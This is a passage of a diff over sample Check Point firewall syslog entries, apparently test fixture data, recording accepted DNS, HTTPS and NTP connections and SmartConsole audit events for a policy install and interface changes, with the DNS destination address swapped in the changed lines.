src:"192.168.2.2"] -<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44927"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58546"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502488"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d918,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"216.58.208.106"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48722"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d91c,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"52"; version:"5"; additional_info:"Access Control Policy : Standard"; administrator:"admin"; audit_status:"Success"; client_ip:"192.168.1.117"; machine:"192.168.1.117"; objectname:"gw-da58d3"; objecttable:"applications"; objecttype:"firewall_application"; operation:"Install Policy"; operation_number:"7"; product:"SmartConsole"; subject:"Policy Installation"; uid:"{FF0154DE-7D18-4396-B0C2-7E8951B393A4}"] <134>1 2020-03-29T17:21:32Z gw-da58d3 CheckPoint 8363 - [flags:"147456"; ifdir:"inbound"; logid:"134217728"; loguid:"{0x5e80d91c,0x0,0x6401a8c0,0x216}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; additional_info:"Access Control Policy : Standard"; administrator:"admin"; cu_detected_by:"192.168.1.100"; cu_detection_time:"1585502492"; cu_last_update_time:"1585502492"; cu_log_count:"1"; cu_rule_category:"Informational"; cu_rule_id:"{58144F8B-A181-AB98-A857-2A8F6CFEA948}"; domain:"SMC User"; event_end_time:"1585502492"; event_name:"Policy installation"; event_start_time:"1585502492"; is_correlated:"1"; is_last:"1"; log_id:"2000"; machine:"3232235893"; max_num_count_detected:"1"; num_of_updates:"0"; objectname:"gw-da58d3"; origin_repetitions:"1"; origin_sic_name:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; product:"SmartConsole"; severity:"0"; source_repetitions:"1"; time_interval:"60"; users_repetitions:"1"] <134>1 2020-03-29T17:21:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d91d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57621"; service:"57621"; src:"192.168.1.94"] -<134>1 2020-03-29T17:21:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d922,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502498"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56496"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d922,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502498"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56496"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d922,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"216.58.208.98"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40294"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:22:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43301"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:22:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d93d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:22:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39213"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:22:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50380"; service:"123"; 
service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:22:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"174.138.9.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53666"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:22:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502527"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53845"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:22:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d93f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502527"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53845"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; administrator:"admin"; advanced_changes:" "; client_ip:"192.168.1.117"; fieldschanges:"Calculated Security Zone: 'ExternalZone' Security Zone Name: 'ExternalZone' Topology Type: Changed from 'Internal (leads to local network)' to 'External (leads out to the internet)' TopologyCalculationType: Changed from 'Automatic' to 'Manual' "; logic_changes:"SecurityZoneSettings.calculatedSecurityZone: '237a4cbc-7fb6-4d50-872a-4904468271c4' SecurityZoneSettings.securityZoneName: 'ExternalZone' TopologySettings.manualTopology.type: Changed from 'INTERNAL' to 'EXTERNAL' TopologySettings.topologyCalculationType: Changed from 'AUTO' to 'MANUAL' "; objectname:"eth0"; objecttype:"Interface Network"; operation:"Modify Object"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Object Manipulation"; uid:"18c5f54f-0c75-4632-a8e1-a561618c9a0e"] <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; administrator:"admin"; advanced_changes:" "; client_ip:"192.168.1.117"; 
fieldschanges:"Calculated Security Zone: 'InternalZone' Security Zone Name: 'InternalZone' TopologyCalculationType: Changed from 'Automatic' to 'Manual' "; logic_changes:"SecurityZoneSettings.calculatedSecurityZone: 'e8131db2-8388-42a5-924a-82de32db20f7' SecurityZoneSettings.securityZoneName: 'InternalZone' TopologySettings.topologyCalculationType: Changed from 'AUTO' to 'MANUAL' "; objectname:"eth1"; objecttype:"Interface Network"; operation:"Modify Object"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Object Manipulation"; uid:"98745c30-ac3e-4728-b7d7-634f0c115099"]
 <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x2,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; administrator:"admin"; advanced_changes:" "; client_ip:"192.168.1.117"; fieldschanges:"@Interface Index: '1' Hardware: Changed from 'Open server' to 'software' IP Address: '192.168.1.100', '192.168.2.1' Interface Name: 'eth0', 'eth1' Leads out to the Internet: 'Enable' Monitored by ClusterXL: 'Enable' Net Mask: '255.255.255.0' Color: 'Black' "; ip_address:"192.168.1.100"; logic_changes:"ApplianceType: Changed from 'Open server' to 'software' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].color: 'BLACK' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].ipaddr: '192.168.1.100' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].monitoredByCluster: 'Enable' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].netmask: '255.255.255.0' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].officialname: 'eth0' Interfaces[{48bc1a76-5a6f-4144-8da6-a99f27cacbd1}\].security.netaccess.leadsToInternet: 'Enable' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].color: 'BLACK' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].ifindex: '1' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].ipaddr: '192.168.2.1' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].monitoredByCluster: 'Enable' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].netmask: '255.255.255.0' Interfaces[{56ae8c4d-c4b2-421f-8b19-094c50bc15c9}\].officialname: 'eth1' "; objectname:"gw-da58d3"; objecttype:"Gateway"; operation:"Modify Object"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Object Manipulation"; uid:"17c04677-871e-f346-a0dd-3705cb95068f"]
 <134>1 2020-03-29T17:22:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"163872"; ifdir:"outbound"; loguid:"{0x5e80d956,0x3,0x6401a8c0,0x108620ab}"; origin:"192.168.1.117"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; administrator:"admin"; client_ip:"192.168.1.117"; fieldschanges:"3 Objects were changed"; operation:"Publish"; product:"SmartConsole"; sendtotrackerasadvancedauditlog:"0"; session_name:"admin@3/29/2020"; session_uid:"5cc8360f-36a6-4dfc-ba84-7042e5cdd5e9"; subject:"Revision Control"]
-<134>1 2020-03-29T17:22:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d961,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502561"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51100"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:22:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d961,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502561"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51100"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
